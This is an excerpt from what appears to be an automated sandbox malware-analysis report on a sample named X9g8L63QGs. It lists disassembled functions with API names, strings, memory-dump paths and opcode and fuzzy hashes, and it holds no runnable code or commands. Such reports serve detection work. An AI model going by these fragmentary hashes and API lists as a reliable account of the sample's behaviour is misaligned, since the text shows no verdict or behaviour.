                                                                                                                                                                                                                                                                    • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                                                    • Opcode ID: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
                                                                                                                                                                                                                                                                    • Instruction ID: 22cad1ae816d5290cecbe1a906a077b412109e214054b6e8a2fe779c8b85353d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB0290E1A0E64286FB548B31E858B7963A5FF84B58F584235DE5E426A4EF3CE448C70C
                                                                                                                                                                                                                                                                    Function 00007FFB0C1A6360 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007F805
                                                                                                                                                                                                                                                                    • String ID: BEGIN$sqlite3.connect$sqlite3.connect/handle
                                                                                                                                                                                                                                                                    • API String ID: 4011786353-2348745481
                                                                                                                                                                                                                                                                    • Opcode ID: 9d4ea5e82f375ba1b03b948d9975b46a180430bb194de34b564c94f02b4a9628
                                                                                                                                                                                                                                                                    • Instruction ID: 76a0b9723a6547e330aa9eff771c2d4f8c0216d845693f20a54e460425e2aaa9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d4ea5e82f375ba1b03b948d9975b46a180430bb194de34b564c94f02b4a9628
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDB137F6A09B42C6EB608F75E948A6933A4FF49B94F084175DA8E43B64DF3CE456C700
                                                                                                                                                                                                                                                                    Function 00007FFB0C02D9E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010$FileRead
                                                                                                                                                                                                                                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                                                    • API String ID: 1046191242-1843600136
                                                                                                                                                                                                                                                                    • Opcode ID: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                                                    • Instruction ID: e2a9570a871c565af9b859ee56089887b7dfd66812692363ffb069ca447db785
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66d7818fc9c6dce62004362554e4c0cfd5c82727d3bea9d87ae7196a0384542c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 834103E2A0C74686E6118F35E848DA9B7A6FF94B80F544032EE5D47694EF3CE846C748
                                                                                                                                                                                                                                                                    Function 00007FFB1BA44484 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77networkCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$connect
                                                                                                                                                                                                                                                                    • String ID: 3'
                                                                                                                                                                                                                                                                    • API String ID: 375857812-280543908
                                                                                                                                                                                                                                                                    • Opcode ID: 5eb7b83bdcbeebc66fb35dc6d107fd47d0d0fc8193655a836ea57c28fa277336
                                                                                                                                                                                                                                                                    • Instruction ID: 428edc16c8630e27337acb798091ab0a402dee1c39b4c0b13ca6877538a09735
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eb7b83bdcbeebc66fb35dc6d107fd47d0d0fc8193655a836ea57c28fa277336
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 203192B1B28F4286EB688F75E44417962A2FF447B4F08A335EA5D437B4DF3CE8408601
                                                                                                                                                                                                                                                                    Function 00007FFB1B6F430C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68libraryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastLibraryLoad
                                                                                                                                                                                                                                                                    • String ID: Could not find module '%.500S' (or one of its dependencies). Try using the full path with constructor syntax.$U|i:LoadLibrary$ctypes.dlopen
                                                                                                                                                                                                                                                                    • API String ID: 3568775529-808210370
                                                                                                                                                                                                                                                                    • Opcode ID: 0ef92c86ac34224fd7b744c122e0fbdae20da82744e633dcfb4756fea1e00fda
                                                                                                                                                                                                                                                                    • Instruction ID: 1f6fc711a0996a6cf0c9c96cebed4e7434102380b1f30ba7ac6b886a8cb4ec06
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ef92c86ac34224fd7b744c122e0fbdae20da82744e633dcfb4756fea1e00fda
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 672130A1A08E4781EF049B73F85407967A2AF5ABB5F04E036E90E42AB4DE7CE54DC300
                                                                                                                                                                                                                                                                    Function 00007FF7C2675698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1279662727-0
                                                                                                                                                                                                                                                                    • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                                    • Instruction ID: da5c33fd950796afd40a7cb3253b1ab66723926da7e83c5d5a300bda850eb57c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F417122D1878183E650BF20A554379A361FB94B64F509335EAD816FD2DFBCA5E0C770
                                                                                                                                                                                                                                                                    Function 00007FF7C266CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3251591375-0
                                                                                                                                                                                                                                                                    • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                    • Instruction ID: 2af43a21fc74c0dd2b4060972e7336cc958d749b6054f2b772889b8c6f5dd35c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6316A10E08A4281EA14BF65D4263B9A6A3AF457A8FC44434D5CE67FD7CEFCA404C278
                                                                                                                                                                                                                                                                    Function 00007FF7C26701AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                    • Instruction ID: 617fc03ff3f9e854066d8498c3b1f98936eb5ea6fb4ea4be974dbb0a4e50e24f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E51E562A0D24286E664BE65A40067AA293AF44FB4F944734EDFC67FC5CFBCE441C630
                                                                                                                                                                                                                                                                    Function 00007FF7C267C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                    • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                    • Instruction ID: 9166d89e9377bcecf70a000bd8166301b1c294d74d640adc35a1f1887f2ae279
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F11E261618B8181DA10AF25B804169A362BB41FF4FA40331EEBD5BBE8CFBCD001C720
                                                                                                                                                                                                                                                                    Function 00007FFB1BA446B0 Relevance: 3.0, APIs: 2, Instructions: 34networkCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastioctlsocket
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1021210092-0
                                                                                                                                                                                                                                                                    • Opcode ID: 964070f957597cead12d681d8d9d4b975f1a861eb6e29b6fc22a496edc13ce25
                                                                                                                                                                                                                                                                    • Instruction ID: 5dabd3029d1a893abfffc1a86bb849a77838bb7ec6aa0d5864e49b0f3c04a84a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 964070f957597cead12d681d8d9d4b975f1a861eb6e29b6fc22a496edc13ce25
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F014471B29E4286E3149B76F44406977A5FF88BF1B58A230DA5E43B74DE3CD4A58700
                                                                                                                                                                                                                                                                    Function 00007FFB1BA45338 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007A3440closesocket
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3394225953-0
                                                                                                                                                                                                                                                                    • Opcode ID: 469834960f5fb333051253006ecc6c4dbb46e8df025279c03e012d890aa341a8
                                                                                                                                                                                                                                                                    • Instruction ID: fa7685f216c590f487629512190c701acb9784ef2b78606b743253b3c032152f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 469834960f5fb333051253006ecc6c4dbb46e8df025279c03e012d890aa341a8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F036A1A28F4186D6589B75F44806C7365FF48B75B1CA731DABA03BF0CF7CE4558200
                                                                                                                                                                                                                                                                    Function 00007FF7C267ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00007FF7C267AA45,?,?,00000000,00007FF7C267AAFA), ref: 00007FF7C267AC36
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7C267AA45,?,?,00000000,00007FF7C267AAFA), ref: 00007FF7C267AC40
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                    • Instruction ID: d11c77f138bbff2ebabcbba1e267ad5e276477d45bdcd46752a540659b9a8099
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0215011B1C64291EA947F61B45427D9293AF84FB0F984235DAAEA7BD1CFFCA845C330
                                                                                                                                                                                                                                                                    Function 00007FF7C267BF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                    • Instruction ID: a524dea2fd5443b9b605d2abb9b29dfd3c99ee1e95fb12a2d6c3c56bcfd47aa7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E641B53290864187EA34BE25B54027DB3A2EB55F64F900135DACEA3B95CFADE442CB71
                                                                                                                                                                                                                                                                    Function 00007FF7C2667F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _fread_nolock
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 840049012-0
                                                                                                                                                                                                                                                                    • Opcode ID: 57c2c4b4067f487da02ee57e8c6367b5d15013a29cd3414ac047bd2cce026e08
                                                                                                                                                                                                                                                                    • Instruction ID: cd73bec62f283a293e7dc0aaf6d897f8531808d6072ab5a9e6e6a478bd517c0c
